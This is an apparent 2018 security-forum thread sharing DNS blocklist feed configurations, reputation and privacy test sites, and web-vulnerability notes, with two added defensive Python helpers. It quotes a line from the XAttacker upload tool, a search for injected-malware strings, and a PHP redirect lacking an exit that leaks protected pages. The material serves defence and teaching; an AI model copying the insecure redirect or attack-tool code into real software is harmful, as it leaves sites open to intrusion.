##Dshield-Suspicious   black   https://www.dshield.org/feeds/suspiciousdomains_High.txt   /etc/unbound/dshield-suspicious.list   86400   @DOMAIN   ^site$
#Dshield-Whitelist   white   https://dshield.org/feeds/suspiciousdomains_whitelist_approved.txt   /etc/unbound/dshield-white.list   86400   @DOMAIN   ^site$

##FireHol1   black   https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_level1.netset   /etc/unbound/firehol1.list   86400   @IP
#FireHol2   black   https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_level2.netset   /etc/unbound/firehol2.list   86400   @IP
#FireHol3   black   https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_level3.netset   /etc/unbound/firehol3.list   86400   @IP
#FireHol4   black   https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_level4.netset   /etc/unbound/firehol4.list   86400   @IP
#FireHol-Abusers   black   https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/firehol_abusers_30d.netset   /etc/unbound/firehol-abusers.list   86400   @IP

##BaddBoys   black   https://raw.githubusercontent.com/mitchellkrogza/Badd-Boyz-Hosts/master/hosts   /etc/unbound/baddboyz.list   86400   @HOST0
#Krogza-False-Positive   exclude   https://raw.githubusercontent.com/mitchellkrogza/CENTRAL-REPO.Dead.Inactive.Whitelisted.Domains.For.Hosts.Projects/master/DOMAINS-whitelist.txt   /etc/unbound/krogza-fp.list   86400   @DOMAIN
#Krogza-Dead-Domains   exclude   https://raw.githubusercontent.com/mitchellkrogza/CENTRAL-REPO.Dead.Inactive.Whitelisted.Domains.For.Hosts.Projects/master/DOMAINS-dead.txt   /etc/unbound/krogza-dead.list   86400   @DOMAIN
#Krogza-Reactivated   black   https://raw.githubusercontent.com/mitchellkrogza/CENTRAL-REPO.Dead.Inactive.Whitelisted.Domains.For.Hosts.Projects/master/DOMAINS-re-active.txt   /etc/unbound/krogza-reactivate.list   86400   @DOMAIN
#Krogza-Ultimate-IP   black   https://hosts.ubuntu101.co.za/ips.list   /etc/unbound/krogza-ultimate-ip.list   86400   @IP
#Krogza-Ultimate-Domain   black   https://hosts.ubuntu101.co.za/domains.list   /etc/unbound/krogza-ultimate-domain.list   86400   @DOMAIN
##Krogza-Hacked   black   https://raw.githubusercontent.com/mitchellkrogza/The-Big-List-of-Hacked-Malware-Web-Sites/master/hacked-domains.list   /etc/unbound/krogza-hacked.list   86400   @DOMAIN

##Notracking-Hosts   black   https://raw.githubusercontent.com/notracking/hosts-blocklists/master/hostnames.txt   /etc/unbound/notracking-hosts.list   86400   @HOST0
##Notracking-Domains   black   https://raw.githubusercontent.com/notracking/hosts-blocklists/master/domains.txt   /etc/unbound/notracking-domains.list   86400   @DNSMASQ-ADDRESS

##SpamHaus-Top10-TLD   black   https://www.spamhaus.org/statistics/tlds/   /etc/unbound/spamhaus-top10-tld.list   86400   @SPAMHAUS
##SpamHaus-Top10-BotNet   black   https://www.spamhaus.org/statistics/botnet-isp/   /etc/unbound/spamhaus-top10-botnet.list   86400   @SPAMHAUS
##SpamHaus-Top10-ASN   black   https://www.spamhaus.org/statistics/botnet-asn/   /etc/unbound/spamhaus-top10-asn.list   86400   @SPAMHAUS
##SpamHaus-Drop   black   https://www.spamhaus.org/drop/drop.txt   /etc/unbound/spamhaus-drop.list   86400   @IP
##SpamHaus-Edrop   black   https://www.spamhaus.org/drop/edrop.txt   /etc/unbound/spamhaus-edrop.list   86400   @IP
##SpamHaus-DropV6   black   https://www.spamhaus.org/drop/dropv6.txt   /etc/unbound/spamhaus-dropv6.list   86400   @IP
##SpamHaus-ASNDrop   black   https://www.spamhaus.org/drop/asndrop.txt   /etc/unbound/spamhaus-asndrop.list   86400   @ASN

##Steven-Black-Hosts   black   https://raw.githubusercontent.com/StevenBlack/hosts/master/alternates/fakenews-gambling-porn/hosts   /etc/unbound/stevenblack.list   86400   @HOST0

#SquidBlackList-Ads   black   https://www.squidblacklist.org/downloads/dg-ads.acl   /etc/unbound/squidblacklist-ads.list   86400   @DOMAIN
#SquidBlackList-Malicious   black   https://www.squidblacklist.org/downloads/dg-malicious.acl   /etc/unbound/squidblacklist-malicious.list   86400   @DOMAIN

##Suspect-Networks   black   https://suspect-networks.io/downloads/suspect_networks.txt   /etc/unbound/suspect-networks.list   86400   @IP

##Turris-Grey   black   https://project.turris.cz/greylist-data/greylist-latest.csv   /etc/unbound/turris-grey.list   86400   @IP

#Zonefiles-Malware   black   https://zonefiles.io/f/compromised/domains/live/   /etc/unbound/zonefiles-malware.list   86400   @DOMAIN
#Zonefiles-Malware-IP   black   https://zonefiles.io/f/compromised/ip/live/   /etc/unbound/zonefiles-malware-ip.list   86400   @IP

##MalwareDomainList   black   http://www.malwaredomainlist.com/hostslist/hosts.txt   /etc/unbound/malwaredomain.list   86400   @HOST127

##MailwareDomains   black   https://mirror1.malwaredomains.com/files/justdomains   /etc/unbound/malwaredomains.list   86400   @DOMAIN
##Bulk-Registars   black   http://mirror1.malwaredomains.com/files/bulk_registrars.txt   /etc/unbound/bulk-registars.list   86400   @DOMAIN-WILDCARD
##Immortal-Malware   black   http://mirror1.malwaredomains.com/files/immortal_domains.txt   /etc/unbound/immortal-domains.list   86400   @DOMAIN
##Skype-Resolvers   black   http://mirror1.malwaredomains.com/files/Skype-resolvers.txt   /etc/unbound/skype-resolvers.list   86400   @DOMAIN
##Free-WebHosts   black   http://mirror1.malwaredomains.com/files/freewebhosts.txt   /etc/unbound/freewebhosts.list   86400   @DOMAIN
##Spyware   black   http://mirror1.malwaredomains.com/files/spywaredomains.zones   /etc/unbound/spyware.list   86400   @ZONE

##RansomeWareTracker-Domains   black   https://ransomwaretracker.abuse.ch/downloads/RW_DOMBL.txt   /etc/unbound/ransomewaretracker-doms.list   86400   @DOMAIN
##RansomeWareTracker-IPs   black   https://ransomwaretracker.abuse.ch/downloads/RW_IPBL.txt   /etc/unbound/ransomewaretracker-ips.list   86400   @IP
##ZeusTracker-BadDomains   black   https://zeustracker.abuse.ch/blocklist.php?download=baddomains   /etc/unbound/zeus-baddomains.list   86400   @DOMAIN
##ZeusTracker-BadIPs   black   https://zeustracker.abuse.ch/blocklist.php?download=badips   /etc/unbound/zeus-badips.list   86400   @IP
##Feado-Domains   black   https://feodotracker.abuse.ch/blocklist/?download=domainblocklist   /etc/unbound/feado-domains.list   86400   @DOMAIN
##Feado-IPs   black   https://feodotracker.abuse.ch/blocklist/?download=ipblocklist   /etc/unbound/feado-ips.list   86400   @IP
#SSL-BL   black   https://sslbl.abuse.ch/blacklist/sslipblacklist.csv   /etc/unbound/ssl-blacklist.list   86400   @IP

#SA-BlackList   black   http://www.sa-blacklist.stearns.org/sa-blacklist/sa-blacklist.current.domains   /etc/unbound/sa-blacklist.list   86400   @DOMAIN

#OpenPhish   black   https://openphish.com/feed.txt   /etc/unbound/openphish.list   86400   @URL

#PhishTank   black   http://data.phishtank.com/data/online-valid.csv   /etc/unbound/phishtank.list   86400   @URLCSV2

#HPHosts-Ads   black   https://hosts-file.net/ad_servers.txt   /etc/unbound/hphosts-ads.list   86400   @HOST127
#HPHosts-Exploit   black   https://hosts-file.net/exp.txt   /etc/unbound/hphosts-exploit.list   86400   @HOST127
#HPHosts-Misleading   black   http://hosts-file.net/mmt.txt   /etc/unbound/hphosts-misleading.list   86400   @HOST127
#HPHosts-Phising   black   https://hosts-file.net/psh.txt   /etc/unbound/hphosts-phising.list   86400   @HOST127

##Blacklist.DE   black   https://lists.blocklist.de/lists/all.txt   /etc/unbound/blocklist.de.list   86400   @IP
##Blacklist.DE-Strong   black   https://lists.blocklist.de/lists/strongips.txt   /etc/unbound/blocklist.de-strong.list   86400   @IP

#Bogon4   black   https://www.team-cymru.org/Services/Bogons/fullbogons-ipv4.txt   /etc/unbound/bogon4.list   86400   @IP
#Bogon6   black   https://www.team-cymru.org/Services/Bogons/fullbogons-ipv6.txt   /etc/unbound/bogon6.list   86400   @IP

Info credits: cbuijs

polonus
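Added here as an illustration, not code from cbuijs's project: a small parser for the list-definition format quoted above, plus a check that any entry reading another entry's ".download" file has that provider entry enabled. The field meanings (name, action, source, local file, TTL, @FORMAT tags, optional trailing regex) and the ".download" file naming are inferred from the listing, not documented on the page, so treat them as assumptions.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple

ACTIONS = {"black", "white", "exclude"}


@dataclass
class ListEntry:
    name: str
    action: str            # black / white / exclude
    source: str            # download URL or local path
    local_file: Optional[str]
    ttl: Optional[int]     # refresh interval in seconds (assumed meaning of the 86400 column)
    formats: List[str]     # @DOMAIN, @IP, @HOST0, @ADBLOCK-BLACK, ...
    regex: Optional[str]   # optional trailing filter such as ^site$
    enabled: bool          # False when the line is commented out with '#'


def parse_line(line: str) -> Optional[ListEntry]:
    """Parse one definition line; blank lines and '//' lines yield None."""
    stripped = line.strip()
    if not stripped or stripped.startswith("//"):
        return None
    enabled = not stripped.startswith("#")
    fields = stripped.lstrip("#").split()      # '#' and '##' both mean disabled
    if len(fields) < 3:
        raise ValueError(f"expected at least name/action/source: {line!r}")
    name, action, source = fields[:3]
    if action not in ACTIONS:
        raise ValueError(f"unknown action {action!r} in {line!r}")
    local_file = fields[3] if len(fields) > 3 else None
    ttl = int(fields[4]) if len(fields) > 4 else None
    tail = fields[5:]
    formats = [f for f in tail if f.startswith("@")]
    others = [f for f in tail if not f.startswith("@")]
    regex = " ".join(others) if others else None   # assumption: a regex never starts with '@'
    if regex is not None:
        re.compile(regex)                            # fail early on a broken pattern
    return ListEntry(name, action, source, local_file, ttl, formats, regex, enabled)


def parse_lists(text: str) -> List[ListEntry]:
    return [e for e in (parse_line(l) for l in text.splitlines()) if e is not None]


def enabled_by_format(entries: List[ListEntry]) -> Dict[str, int]:
    """Count enabled entries per @FORMAT tag: shows which list parsers are actually in use."""
    counts: Dict[str, int] = {}
    for e in entries:
        if e.enabled:
            for tag in e.formats:
                counts[tag] = counts.get(tag, 0) + 1
    return counts


def check_dependencies(entries: List[ListEntry]) -> List[Tuple[str, str]]:
    """Derived entries (e.g. EasyList-White) read '<local_file>.download' of another
    entry instead of a URL. Assumption: the firewall stores each fetched list as
    '<local_file>.download', so a commented-out provider never writes that file.
    Returns (dependent, missing provider) pairs."""
    providers = {e.local_file + ".download": e for e in entries if e.local_file}
    problems = []
    for e in entries:
        provider = providers.get(e.source)
        if e.enabled and provider is not None and not provider.enabled:
            problems.append((e.name, provider.name))
    return problems


# Constructed excerpt modelled on the quoted file. EasyList-Dutch is commented out
# on purpose while EasyList-Dutch-White still points at its download file.
SAMPLE = """\
////
Default-Regex-Black   black   /etc/unbound/regex-blacklist
##Disconnect-Ads   black   https://s3.amazonaws.com/lists.disconnect.me/simple_ad.txt   /etc/unbound/disconnect-ads.list   86400   @DOMAIN
EasyList   black   https://easylist.to/easylist/easylist.txt   /etc/unbound/easylist.list   86400   @ADBLOCK-BLACK
EasyList-White   white   /etc/unbound/easylist.list.download   /etc/unbound/easylist-white.list   86400   @ADBLOCK-WHITE   @ADBLOCK-EXCLUDE
#EasyList-Dutch   black   https://easylist-downloads.adblockplus.org/easylistdutch.txt   /etc/unbound/easylist-dutch.list   86400   @ADBLOCK-BLACK
EasyList-Dutch-White   white   /etc/unbound/easylist-dutch.list.download   /etc/unbound/easylist-dutch-white.list   86400   @ADBLOCK-WHITE   @ADBLOCK-EXCLUDE
##CoinBlocker-IP   black   https://raw.githubusercontent.com/ZeroDot1/CoinBlockerLists/master/MiningServerIPList.txt   /etc/unbound/coinblocker-ip.list   86400   @IP
##Dshield-Top10   black   http://feeds.dshield.org/top10-2.txt   /etc/unbound/dshield-top10.list   86400   @HOST   ^site$
"""

if __name__ == "__main__":
    entries = parse_lists(SAMPLE)
    print(f"{sum(e.enabled for e in entries)} of {len(entries)} entries enabled")
    print("enabled per format:", enabled_by_format(entries))
    for child, parent in check_dependencies(entries):
        print(f"WARNING: {child} reads the download of {parent}, which is commented out")
```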
Title: Re: Tests and other Media topics
Post by: polonus on August 12, 2018, 02:40:30 PM
Re: -https://www.makeuseof.com/tag/followed-click-bait-internet-ads-heres-found/  (Clickbait as clickbait goes)

What do you use as a fact checker for clickbait and media bias?
Example: https://mediabiasfactcheck.com/awareness-act/
Or do you have an extension for that?

Is this a new WOT, webutation outlet?

Always take it with a pinch of salt, and make up your own opinion, based on what you know to be facts.
Don't get locked up in your own tunnel-vision.  ;)

polonus
Title: Re: Tests and other Media topics
Post by: bob3160 on August 12, 2018, 03:11:32 PM
Part of the Avast Secure Browser:
(https://screencast-o-matic.com/screenshots/u/Lh/1534079363335-25216.png)
(https://screencast-o-matic.com/screenshots/u/Lh/1534079434258-66231.png)
Title: Re: Tests and other Media topics
Post by: polonus on August 14, 2018, 12:34:51 PM
Does the website you are on offer the new TLS-protocol version?
Firefox browsers are now ready for it.
Read: https://blog.cloudflare.com/rfc-8446-aka-tls-1-3/ *
Test website online here: https://www.1and1.com/ssl-checker

* polonus does not particularly recommend the use of CloudFlare. (Be aware of CloudBleed bug).

polonus
Title: Re: Tests and other Media topics
Post by: mchain on August 15, 2018, 06:58:13 AM
Thanks, pol

avast com has two issues which the ssl test will reveal.  Who to notify?
Title: Re: Tests and other Media topics
Post by: polonus on August 17, 2018, 09:34:24 PM
LS,

Bypassing of cookie crunchers in the browser (uBlock Origin, ABP, Disconnect, Ghostery etc.) by tracking and monitoring cookies.
How they do it and what they do not fix: https://www.theregister.co.uk/2018/08/17/usenix_cookies/
test data: https://wholeftopenthecookiejar.eu/

How to check cookies random example: http://www.cookiechecker.nl/check-cookies.php?url=ogv-pompetzki.de
and another one: https://webcookies.org/cookies/media.reklamaizer.ru/2468946
also scan: https://privacyscore.org/

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 18, 2018, 10:35:19 AM
Canvas Tracking example - give in some text and then click generate (Dutch genereren).
Re: http://ermmedia.nl/canvas/

Protection against canvas tracking: https://thehackernews.com/2017/10/canvas-browser-fingerprint-blocker.html
Trace: -https://www.thewindowsclub.com/trace-offers-tracking-protection-chrome-firefox
MalwareBytes warns against installing Cliqz Internet solution!

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 19, 2018, 08:49:11 PM
Searching for outward links on a malware infested (Ramnit A) domain -888088 dot com:
https://seomon.com/domain/88088.com/outbound/
Also: https://moz.com/researchtools/ose/ which ends August 31st, and now https://moz.com/link-explorer ,
where you have to start an account to scan for links:
Same example from the existing links checker:
https://moz.com/researchtools/ose/links?site=88088.com&filter=&source=external&target=page&group=0&page=1&sort=page_authority&anchor_id=&anchor_type=&anchor_text=&from_site=

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 21, 2018, 06:43:22 PM
On the subject of DNS interception and manipulation, read:

https://www.theregister.co.uk/2018/08/20/dns_interception/

Some tests to perform:

1. https://cmdns.dev.dns-oarc.net/
2. https://medium.com/@dnsoarc/go-go-check-your-dns-resolver-s-8793e977a84d 
3.  https://www.whatsmydns.net/ 
4. https://openresolver.com/?ip=   
5. https://www.cyberciti.biz/faq/how-to-find-out-what-my-dns-servers-address-is/

Tested with a form and
Quote
Recursive resolver is not detected on X.X.X.X

IP address X.X.X.X is not vulnerable to DNS Amplification attacks.

Also test at:
1.  https://dnssec-debugger.verisignlabs.com/ 
2.  http://www.ipvoid.com/dnssec-lookup/

Read: 3. https://pypi.org/project/dnsknife/ 

In the case of error-scanning:
Please check if you can resolve for instance domain address  'mycomputer.bmw.us' to IP at your Security Center
and at your scanner. I suspect you've got bad DNS server address definition.

Enjoy, my good friends,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 21, 2018, 11:55:10 PM
A situation of a malicious 301 redirect flagged by avast's, re: https://forum.avast.com/index.php?topic=221314.msg1473291#new

You can check the search engine friendliness of redirects here: http://www.webconfs.com/redirect-check.php
In the above example we got these results:
Quote
Either www.club21ids.is is NOT REDIRECTING to any URL or the redirect is NOT SEARCH ENGINE FRIENDLY

or check with Google's Malware Check Tool: https://transparencyreport.google.com/safe-browsing/search?url=%20www.club21ids.is
No insecurity found there for -www.club21ids.is .

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 26, 2018, 03:01:05 PM
Added blocklist collection: https://firebog.net/

Also an out-of-the-ordinary blocklist like the coinblocker list: https://zerodot1.gitlab.io/CoinBlockerLists/hosts

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2018, 01:15:11 AM
Sometimes you find a block of Base64 Encoded code on a website & you want to see what that code is all about.

Random example: https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=dHxrbXxeLm5tLn11YEJ7fH0tYltnLV58LV58YltuLX17bnQuaHRtbA%3D%3D~enc  see inside line 32

Here you could have it decoded https://www.base64decode.org/

Our example comes out like this:
Quote
<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" xmlns:ev="http://www.w3.org/2001/xml-events" height="18px" width="18px"><path fill="rgb( 181, 181, 181 )" d="M17.01,7.98299999999995 C17.01,7.98299999999995 17.01,10.005 17.01,10.005 C17.01,10.005 4.87799999999993,10.005 4.87799999999993,10.005 C4.87799999999993,10.005 10.4390000000001,15.566 10.4390000000001,15.566 C10.4390000000001,15.566 9.00299999999993,17.001 9.00299999999993,17.001 C9.00299999999993,17.001 0.99600000000009,8.99400000000003 0.99600000000009,8.99400000000003 C0.99600000000009,8.99400000000003 9.00299999999993,0.98800000000006 9.00299999999993,0.98800000000006 C9.00299999999993,0.98800000000006 10.4390000000001,2.423 10.4390000000001,2.423 C10.4390000000001,2.423 4.87799999999993,7.98299999999995 4.87799999999993,7.98299999999995 C4.87799999999993,7.98299999999995 17.01,7.98299999999995 17.01,7.98299999999995 Z "/></svg>

Good to know if you have some Base64 Decoding and Encoding on your hands, so enjoy my good friends, enjoy.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 27, 2018, 06:28:36 PM
Important today is to know who is tracking you, and who and what to block inside your browser of choice.

Who is tracking you? Find out here: https://whotracks.me/trackers/adriver.html
Related to https://whotracks.me/trackers/aidata.io.html (Mind you several IPs may point to various Autonomous Systems),
Re: https://urlscan.io/domain/ssp.adriver.ru

Re: https://urlquery.net/queue/6866f928-a6f6-4093-aadf-81537d7faeab

https://aw-snap.info/file-viewer/?protocol=not-secure&ref_sel=GSP2&ua_sel=ff&chk-cache=&fs=1&tgt=eDAxLnxbI3x0fC5bXWAwLmdbZjxwWyM9fFBQTntYVVMmWyM9NDE0Njg3NTA2NzkwMzEyOTU1OCZifF5rPXwjfVtWe30%3D~enc

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on September 02, 2018, 12:24:21 AM
Interesting DNS, SSL/TLS, HTTP and HTML results scanner, example:
https://www.htmlyse.com/htmlyse/rules.quantcount.com

Enjoy my friends, enjoy,

A tester online (do not abuse) - http://iseebug.com/XSSOnline/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 04, 2018, 05:40:20 PM
Checking for PHP vulnerabilities, mainly through JavaScript:
What we checked? -> echo"%20<a%20href=$userfile_name><center><b>Sucess%20Upload%20:D%20==>%20$userfile_name</b></center></a>"; from where: hxtps://github.com/Moham3dRiahi/XAttacker/blob/master/XAttacker.php

Analysis at http://www.devbug.co.uk/# produced Line 21: Cross-Site Scripting (XSS) in 'echo' via '$userfile_name'

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 16, 2018, 07:29:44 PM
Handy shortcuts for Google Chrome when your cursor has been hacked through fraudulent helpdesk malware.
ALT-TAB to return to the desktop.
ALT-F4 and close Command-W
Esc stops page from loading

Various Google Chrome shortcuts that everyone who only swipes and clicks should learn by heart:
https://www.computerhope.com/shortcut/chrome.htm

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 21, 2018, 02:50:08 PM
1500 websites hackable with the latest WordPress helpdesk fraud attack:
Read: http://labs.sucuri.net/?note=2018-09-18

Example of a query for vulnerable websites:
https://publicwww.com/websites/%22String.fromCharCode%28118%2C+97%2C+114%2C+32%2C+115%2C+111%2C+109%22/

-publicwww.com is a special search engine to search for compromised and/or compromisable websites, a bit like Shodan.
For instance: https://exploits.shodan.io/?q=String.fromCharCode 
Do not go there, when you plan evil, as all you do is being logged.  :D

But for security researchers it is a trove of treasures.  ;)  8)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 28, 2018, 03:24:57 PM
Have your mail accounts ever been compromised?
Find out here: https://monitor.firefox.com/scan

For one of my mail accounts this showed up, have long changed passwords in the meantime.
Quote
Example: Malwarebytes
Breach date:November 15, 2014
Compromised accounts:111,623
Compromised data:Dates of birth, Email addresses, IP addresses, Passwords, Usernames, Website activity

Breach data are being provided by: https://www.haveibeenpwned.com/

N.B. If you feel uncomfortable scanning, do not!
I know of several users here on the forums, that won't risk going to haveibeenpwned dot com for instance.


Damian aka polonus
Title: Re: Tests and other Media topics
Post by: polonus on September 29, 2018, 10:35:41 PM
Fun Countdown Clock:
https://www.timeanddate.com/counters/newyear.html?p0=534

pol
Title: Re: Tests and other Media topics
Post by: polonus on October 05, 2018, 10:56:43 PM
Abuse IP base: https://www.abuseipdb.com/check/5.188.10.76
Bad ip resource to check against: https://www.bytefarm.ch/fail2ban/
Reporting: ip   hostname   tor   country   filter(s)   first reported   last reported   hits   reported by'..'
-5.188.10.76   -5.188.10.76   n    [RU] Russian Federation   sshd   06.06.2018 15:46.03 GMT+0200   13.09.2018 00:08.37 GMT+0200   11   2 host(s)

On belated reporting read: https://abuse.ch/blog/measuring-reaction-time-of-abuse-desks/

and check: https://urlhaus.abuse.ch/browse.php?search=5.188.10.76

Another interesting SSL resource bad certs: https://sslbl.abuse.ch/

Incidents as detected on AS: (random example) https://abuse.shaunc.com/incidents/about/AS16276/

A fail2ban repository from a home address: https://jackfarrand.uk/admin/

Another resource: https://packettotal.com/app/analysis?id=7b770d9a70d575f66e8778b0bb5bdf8e&name=conn

list of bruteforcers: https://home.nuug.no/~peter/bruteforcers.txt

attackers going on: https://attackers.ongoing.today/httpd.txt

another drop of attackers: https://report.cs.rutgers.edu/DROP/attackers

SSH honeypot: https://otx.alienvault.com/pulse/5b8fd4d62f7c866a98fcf80b

spam emitters: https://www.megarbl.net/asncheck/AS16276

POWER DNS queries for non-existent records for existing domains:
https://ns1.fast.qa/?ring=nxdomain-queries

So some lists abuse galore  >:( :D

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 14, 2018, 08:47:10 PM
Links to check on spam-IPs:
Found at: https://github.com/stamparm/ipsum  in its Hall of Shame.
Checked for higher miniFraud Score: https://www.maxmind.com/en/high-risk-ip-sample/171.25.193.25
Forum spam checker: https://www.stopforumspam.com/ipcheck/171.25.193.25
At project honeypot's: https://www.projecthoneypot.org/ip_171.25.193.25
Green Snow list: https://greensnow.co/view/171.25.193.25
WatchGuard RepAuthority's list check: http://www.reputationauthority.org/lookup.php?ip=tor-exit5-readme.dfri.se
In beta: http://beta.brightcloud.com/tools/url-ip-lookup.php

Enjoy, my friends, enjoy,

polonus

P.S. And to say with my good friend, Pondus, it is always a good idea to check IPs against VT:
https://www.virustotal.com/#/ip-address/171.25.193.25

Damian

Title: Re: Tests and other Media topics
Post by: polonus on October 17, 2018, 11:48:01 PM
Known CMSs still accept older PHP versions and, accordingly, their vulnerabilities (Drupal, Joomla, Word Press)

Check your code online at the PHPStan Playground...
checked vulnerable code like
Quote
<?
session_start();
include (“../config.php”);
echo $loggedin;

if ($loggedin != “1”){
header(“Location: http://www.google.com”); /* Redirect browser */

}

{
echo “Will this code Get executed?”;
}?>
Where we stumble upon
Quote
unexpected T_STRING, expecting ';'
in line 12 - While testing a web application today, I noticed an unusual 302 HTTP response. Normally a 302 response just has a header and no html code, because it's meant to be redirecting you to the page cited in the 'Location' field of the http header. The 302 response had the html code which will be presented to the authenticated admin user, but we didn't have the admin credentials. So, how are we seeing this code? After analyzing the 302 redirect response, we concluded that this was the result of insecure coding. Info credits go to Tesjawi.

So not escaping quotes in the string, of course it's not going to work.
Just add a \ before the " in the <input> tag and you are good to go.
(pol).
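Added example, not from the post or from Tesjawi's write-up: a small Python check for the symptom described above, a 3xx response that carries a Location header and still ships page markup in its body, which is what the PHP above produces when header("Location: ...") is not followed by an exit. Both HTTP responses below are constructed samples.

```python
import re

# Constructed sample: what the vulnerable PHP produces when nothing stops
# execution after header("Location: ...") and the rest of the page is still sent.
LEAKY_RESPONSE = "\r\n".join([
    "HTTP/1.1 302 Found",
    "Location: http://www.google.com",
    "Content-Type: text/html; charset=UTF-8",
    "",
    '<html><body><h1>Admin panel</h1><form action="/admin/users.php">'
    '<input name="user"></form></body></html>',
])

# Constructed sample: the same redirect once an exit; follows the header() call.
CLEAN_RESPONSE = "\r\n".join([
    "HTTP/1.1 302 Found",
    "Location: http://www.google.com",
    "Content-Length: 0",
    "",
    "",
])

# Tags that indicate a real page body rather than an empty redirect.
MARKUP = re.compile(r"<(html|body|form|table|script|input)\b", re.IGNORECASE)


def check_redirect_leak(raw_response: str) -> dict:
    """Parse a raw HTTP response and report whether a redirect leaks page content."""
    head, _, body = raw_response.partition("\r\n\r\n")
    status_line, *header_lines = head.split("\r\n")
    status = int(status_line.split()[1])
    headers = {}
    for line in header_lines:
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    is_redirect = 300 <= status < 400 and "location" in headers
    return {
        "status": status,
        "location": headers.get("location"),
        "body_bytes": len(body.encode()),
        # A redirect whose body contains real markup is the insecure-coding case:
        # the protected page is delivered even though the browser moves away.
        "leaks_content": is_redirect and MARKUP.search(body) is not None,
    }


if __name__ == "__main__":
    for label, resp in (("leaky", LEAKY_RESPONSE), ("clean", CLEAN_RESPONSE)):
        print(label, check_redirect_leak(resp))
```

Run it against a saved response from a proxy or curl -i capture to confirm that a redirect away from a protected page carries no body.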

Check with PHP malware finder: https://github.com/nbs-system/php-malware-finder/

Enjoy, my good friends, enjoy, and remember PHP often can be inherently insecure.

Encrypted with Yellowpipe's Code Source Encrypter it looks like
Quote
<script>
<!--
document.write(unescape("%3C%3F%0Asession_start%28%29%3B%0Ainclude%20%28%u201C../config.php%u201D%29%3B%0Aecho%20%24loggedin%3B%0A%0Aif%20%28%24loggedin%20%21%3D%20%u201C1%u201D%29%7B%0Aheader%28%u201CLocation%3A%20http%3A//www.google.com%u201D%29%3B%20/*%20Redirect%20browser%20*/%0A%0A%7D%0A%0A%7B%0Aecho%20%u201CWill%20this%20code%20Get%20executed%3F%u201D%3B%0A%7D%3F%3E"));
//-->
</script>
  file: 368a84ccc831bea70c7649b7ce50c0abea9c4557: 412 bytes
     file: c01a81e4621b7a3059b2257cffb9f2c743efd250: 223 bytes

Decoded Files
368a/84ccc831bea70c7649b7ce50c0abea9c4557 from script (412 bytes, 4 hidden) download
coded source: c01a/81e4621b7a3059b2257cffb9f2c743efd250 from script (223 bytes)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 21, 2018, 09:34:40 PM
Pages to test your ad-blocker performance: https://pi-hole.net/pages-to-test-ad-blocking-performance/

Read: https://www.raymond.cc/blog/10-ad-blocking-extensions-tested-for-best-performance/

Another test: https://ads-blocker.com/testing/

Peculiar subliminal adtest: https://ads-blocker.com/subliminal-advertising/  (not for minors!)
Also see: https://ads-blocker.com/block-referral-spam/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 22, 2018, 09:16:28 PM
A not so well-known browser leak is known as TLS session resumption tracking,
set per default for seven days instead of the 10 hours several known security researchers propose.

This tracking is even more of a problem on Android devices,
where the browser sessions could stay open much longer.

Both Facebook and Google abuse this security protocol for (third party) user tracking and monitoring.
When the user blocks one ad-tracking method, they find a way around it one way or another.
It is just a big uneven cat and mouse game.

Read: https://www.theregister.co.uk/2018/10/19/tls_handshake_privacy/

But there are many more ways to track someone through a browser at the cost of privacy.

Test: Notable testing websites:

https://browserleaks.com/

https://whoer.net/

https://ip-check.info/?foundHTTPS=true

https://panopticlick.eff.org/

https://www.doileak.com/

Also read here: https://www.reddit.com/r/privacy/comments/8221hn/tob_ios_browser_vs_duck_duck_go_ios_browser_vs/
Do not understand why some block reddit now as being a form of  "fake news"?

polonus (volunteer website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on October 25, 2018, 12:38:51 AM
Feeds: https://app.cymon.io/feeds  with various malware trackers.

There is loads, like this one: https://urlhaus.abuse.ch/browse/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 25, 2018, 12:33:49 PM
Multiple 0-days in Magecart: https://gwillem.gitlab.io/2018/10/23/magecart-extension-0days/

An older object injection exploit from 2014 was again being used:
Re: https://websec.wordpress.com/2014/12/08/magento-1-9-0-1-poi/

And dangerous PHP function was being abused: http://php.net/manual/en/function.unserialize.php

Check:  https://www.functions-online.com/unserialize.html

polonus
Title: Re: Tests and other Media topics
Post by: polonus on October 29, 2018, 03:52:25 PM
Interesting virtual representation on malware analysis:
https://app.any.run/tasks/e15b7ee2-5977-4b8d-b2d7-4a1c74236c52
Also see: https://app.any.run/submissions
and https://report.any.run/44c359341f1956e45ed284befb27115db2c4ef78a123234fcbbd18948d109696/0bc676ad-8d64-466f-b9fd-ad3327963fe6#generalInfo

polonus
Title: Re: Tests and other Media topics
Post by: Pondus on October 29, 2018, 05:30:30 PM
Quote
Interesting virtual representation on malware analysis:
https://app.any.run/tasks/e15b7ee2-5977-4b8d-b2d7-4a1c74236c52
Also see: https://app.any.run/submissions
